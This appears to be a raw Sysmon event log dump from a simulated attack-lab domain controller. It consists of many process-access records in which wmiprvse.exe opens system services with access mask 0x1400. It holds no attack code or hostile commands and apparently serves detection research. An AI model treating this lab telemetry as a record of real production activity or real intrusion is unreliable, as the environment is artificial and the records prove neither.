13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005854Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005853Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005852Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005851Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005850Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005849Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005848Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005847Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.281{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 